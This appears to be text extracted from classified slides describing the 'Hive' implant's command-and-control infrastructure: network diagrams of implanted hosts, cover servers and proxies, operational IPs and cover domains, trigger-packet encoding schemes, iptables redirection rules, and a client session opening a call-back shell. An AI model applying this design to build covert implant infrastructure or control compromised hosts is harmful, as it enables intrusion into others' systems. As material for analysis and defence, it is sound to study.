SECRET//NOFORN
Hive Beacon Infrastructure VPS Server Apache with Mod Proxy IPTABLES Forwarding Implanted Host
Implanted Host
Proxy / VPN Server
Cover Server
Implanted Host
Proxy / VPN Server Implanted Host
Log Files Honeycomb
One-way Transfer
RIPPER SNAPPER Database
Blot 4.0
DNS Server
SSL Session Implanted Host
OSN VPN Network Connections Linux-based Infrastructure
SECRET//NOFORN
1
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Servers IPTABLES Forwarding
6 Implanted Host
Cover domain: vhost1.edb.devlan.net
tap010
eth0
10.6.5.191
1
tap011
172.16.63.1
Bridge: br1
Bridge: br2
eth1
10.6.5.190
10.177.77.1 172.16.64.1
Blot
VPN tunnels
eth1
172.16.63.101
eth0
10.6.5.192
2
tap041
4
Cover Server
10.6.5.197 tap040
Cover Server Address Mapping 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap030
tap031
tap020 Implanted Host
tap032
3
172.16.64.10
10.6.5.196
eth1
5
tap021
172.16.63.2
10.2.4.119 Honeycomb
Cover domain: vhost2.edb.devlan.net
Tool Handler
VPS Proxy Port Redirection Map Command Post
Inbound
Redirected
80
8001
443
44301
Bridge: br0
SECRET//NOFORN
2
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
1
tap11
172.16.63.1
Bridge: br1
Bridge: br2
tap41
eth1
Target domain: vhost1.edb.devlan.net
10.177.77.1
tap32
172.16.64.1
Blot
VPN tunnels
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21
2
eth1
172.16.63.2
172.16.64.10
eth1
3
4
Cover Server
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap31
10.6.5.196 tap3
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
SECRET//NOFORN
5
10.2.4.119 Honeycomb Tool Handler
3
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
1
tap11
172.16.63.1
Bridge: br1
Bridge: br2
tap41
eth1
Target domain: vhost1.edb.devlan.net
10.177.77.1
tap32
172.16.64.1
Blot
VPN tunnels
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21
2
eth1
172.16.63.2
172.16.64.10
eth1
3
4
Cover Server
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap31
10.6.5.196 tap3
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
SECRET//NOFORN
5
10.2.4.119 Honeycomb Tool Handler
4
TOP SECRET//SI//NOFORN
Hive Beacon Operational Infrastructure VPS Servers
CentOS-5.6 32-bit
IPTABLES Forwarding Target domain: playa-del-rio.com
Implanted Host
eth0
eth1
172.24.5.141/23
78.47.85.121/28
78.47.85.114/28 eth1
Cover Server
10.177.77.1
CentOS-5.8 64-bit
CentOS-5.6 32-bit eth0
VPN tunnels
91.93.104.178/25
Blot
eth1 Beastbox
172.24.5.132/23
Gateway:78.47.131.65
Implanted Host
eth0
78.47.131.68/29
eth1
Gateway: 88.198.156.225
Honeycomb
88.198.156.226/29 Target domain: viva-rio-engracado.com
172.24.5.188/23
Tool Handler
CentOS-5.8 64-bit
TOP SECRET//SI//NOFORN
5
TOP SECRET//SI//NOFORN
Hive Beacon Operational Infrastructure VPS Servers
CentOS-5.6 32-bit
IPTABLES Forwarding Target domain: playa-del-rio.com
Implanted Host
eth0
eth1
172.24.5.141/23
78.47.85.121/28
78.47.85.114/28 eth1
Cover Server
10.177.77.1
CentOS-5.8 64-bit
CentOS-5.6 32-bit eth0
VPN tunnels
91.93.104.178/25
Blot
eth1 Beastbox
172.24.5.132/23
Gateway:78.47.131.65
Implanted Host
eth0
78.47.131.68/29
eth1
Gateway: 88.198.156.225
Honeycomb
88.198.156.226/29 Target domain: viva-rio-engracado.com
172.24.5.188/23
Tool Handler
CentOS-5.8 64-bit
TOP SECRET//SI//NOFORN
6
SECRET//NOFORN
SinnerTwin Deployment Environment
SECRET//NOFORN
7
SECRET//NOFORN
Hive Operation hived
SSL Session
hclient / cutthroat GENESIS ICON Workstation
Implanted Host
Listening port TriggerListen fork_process
Trigger
P C start_triggered_connect TriggerCallbackSession
P C
StartClientSession launchShell
$ ./cutthroat ./hive > ilm connect
Call-back shell open
> shell open
shell
SECRET//NOFORN
8
SECRET//NOFORN
Raw TCP/UDP Trigger Hive 2.5 Algorithm 400 Bytes 0
8 8-bytes Random Data
92 CRC Random Data
Random Data of length CRC % 200
CRC
12-byte Integer PAD N x 127
25-byte PAD
1-byte 2XOR byte value PAD
Encoded 12-byte Trigger
Random Data
The twelve byte trigger is encoded by XORing the 1-byte XOR value with the first five bytes of the trigger and the remaining trigger bytes or XORed with 0xB6.
Hive 2.6 Algorithm 126 Bytes Minimum / 472 Bytes Maximum 0
8 8-bytes Random Data
92 CRC Random Data
Random Data of length CRC % 200
CRC
Integer 8-byte N x 127 PAD1
Encoded 8-byte 12-byte PAD2 Trigger
Random Data of length CRC % 146
The twelve byte trigger is encoded by computing an offset of CRC % 72 into the CRC random data field and XORing each of the twelve following bytes with the corresponding byte of the twelve-byte trigger payload.
SECRET//NOFORN
9
Scrap slides follow
10
SECRET//SI//NOFORN
Hive Beacon Lab Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host x86 Implanted Host sparc
VPS Servers
Proxy / Director
Response Servers
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eth0 10.6.5.190 52:54:00:9A:B0:72
eri0 10.2.5.5 00:03:BA:86:6A:78
eth0 10.6.5.191/24
tun0 10.177.77.10
eth1 172.16.63.1/24
CentOS-5.9 32-bit
CentOS-6.3 64-bit VPN tunnels
eth1 172.16.63.101
tun0 10.177.77.1
Implanted Host
eth0 10.6.5.192/24
eth1 172.16.64.10
eth1 172.16.63.2/24
Beastbox
VLAN 65
eth2 172.16.64.1
eth0 10.6.5.196
VLAN 65
eth1 172.16.64.100
Honeycomb
eth0 10.6.5.198
Tool Handler
CentOS-6.2 64-bit
CentOS-6.2 64-bit
Bridge: hive1 eth0 10.6.5.195/24
eth0 10.6.5.197
Blot
Target domain: domainB.com
Command Post
Cover Server
Bridge: hive2
VLAN 65
SECRET//SI//NOFORN
11
SECRET//SI//NOFORN
Hive Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host x86 Implanted Host sparc
VPS Servers
Proxy / Director
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eth0 10.6.5.190 52:54:00:9A:B0:72
eri0 10.2.5.5 00:03:BA:86:6A:78
tun0 10.177.77.a
eth1 172.16.63.1/24
eth0 10.6.5.191/24
CentOS-6.3 64-bit
eth1 172.16.63.101
VPN tunnels
eth1:1 172.16.63.102
tun0 10.177.77.b
Implanted Host
Response Servers
tun0 10.177.77.1
eth0 10.6.5.193 52:54:00:95:DA:16
eth0 10.6.5.192/24
eth1 172.16.63.2/24
eth1 172.16.64.10 eth1:1 .11 eth1:2 .12
CentOS-5.9 32-bit
Blot Beastbox
VLAN 65
eth0 10.6.5.196
VLAN 65
eth1 172.16.64.100
Honeycomb
eth0 10.6.5.198
Tool Handler
CentOS-6.2 64-bit
CentOS-6.2 64-bit
Bridge: hive1 eth0 10.6.5.195/24
eth0 10.6.5.197
eth2 172.16.64.1
Target domain: domainB.com
Command Post
Cover Server
Bridge: hive2
VLAN 65
SECRET//SI//NOFORN
12
SECRET//SI//NOFORN
New Hive Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host sparc
VPS Servers
Proxy / Director
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eri0 10.2.5.5
eth1 172.16.64.10
00:03:BA:86:6A:78
eth0 10.6.5.191/24
eth1 172.16.63.1/24
implant1
eth1 172.16.63.111
eth0 10.6.5.190
SSL
52:54:00:9A:B0:72
domainA.com
CentOS-6.4 64-bit
CentOS-6.3 64-bit
Implanted Host x86
Response Servers
eth1:1 172.16.63.112
Nginx Proxy
eth1:1 .11 .12
Cover Server
eth0 10.6.5.197
domainB.com eth1:2
eth2 172.16.64.2
VLAN 65
eth0 10.6.5.189 implant2
Implanted Host
eth0 10.6.5.193 52:54:00:95:DA:16
eth0 10.6.5.192/24
eth1 172.16.63.2/24
VLAN 65
Target domain: domainB.com
CentOS-6.2 64-bit
eth0 10.6.5.195/24
Honeycomb Tool Handler
eth0 10.6.5.198
CentOS-6.2 64-bit
Bridge: hive1 Command Post
eth1 172.16.64.100 domainA.com eth1:1 .101 domainB.com eth1:2 .102
Bridge: hive2 #!/bin/bash # Script to configure policy routing
VLAN 65
echo -en “101\thiveA >> /etc/iproute2/rt_tables echo -en “102\thiveB >> /etc/iproute2/rt_tables ip route add default via 172.16.63.2 table hiveA ip route add default via 172.16.63.2 table hiveB ip rule add from 172.16.63.111 table hiveA prio 1 ip rule add from 172.16.63.112 table hiveB prio 1
SECRET//SI//NOFORN
13
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
eth0
10.3.2.174
Target domain: vhost1.edb.devlan.net
172.16.63.1 p3p2
172.16.64.10 172.16.63.101
Implanted Host
10.3.2.185
Blot Proxy
172.16.64.1
Cover Server
10.3.2.113
with:
VPN Server Apache Server
10.3.2.125
Honeycomb 10.2.4.119
172.16.63.131
Tool Handler
Target domain: vhost2.edb.devlan.net
VPS Server IPTABLES Configuration iptables -P INPUT DROP iptables -P FORWARD DROP iptables -p OUTPUT DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT DNAT iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443 FORWARDING iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT SNAT iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
SECRET//NOFORN
14
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
Target domain: vhost1.edb.devlan.net
tap11
Bridge: br1
172.16.63.1
Bridge: br2
eth1
tap32
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
tap31
tap21
Blot Proxy
172.16.64.1
172.16.64.10 tap41
Cover Server
10.6.5.197 tap4
with:
VPN Server Apache Server
10.6.5.196 tap3
eth1
Honeycomb 10.2.4.119
Tool Handler
172.16.63.2
Target domain: vhost2.edb.devlan.net
VPS Server IPTABLES Configuration iptables -P INPUT DROP iptables -P FORWARD DROP iptables -p OUTPUT DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT DNAT iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443 FORWARDING iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT SNAT iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
SECRET//NOFORN
15
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
Target domain: vhost1.edb.devlan.net
tap11
172.16.63.1
Bridge: br1
Bridge: br2
172.16.64.10 tap41
eth1
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21 eth1
172.16.63.2
tap31
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
tap32
172.16.64.1
172.16.63.101
Cover Server
Blot Proxy with:
VPN Server Apache Server
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
10.6.5.196
SECRET//NOFORN
tap3
Honeycomb 10.2.4.119
Tool Handler
16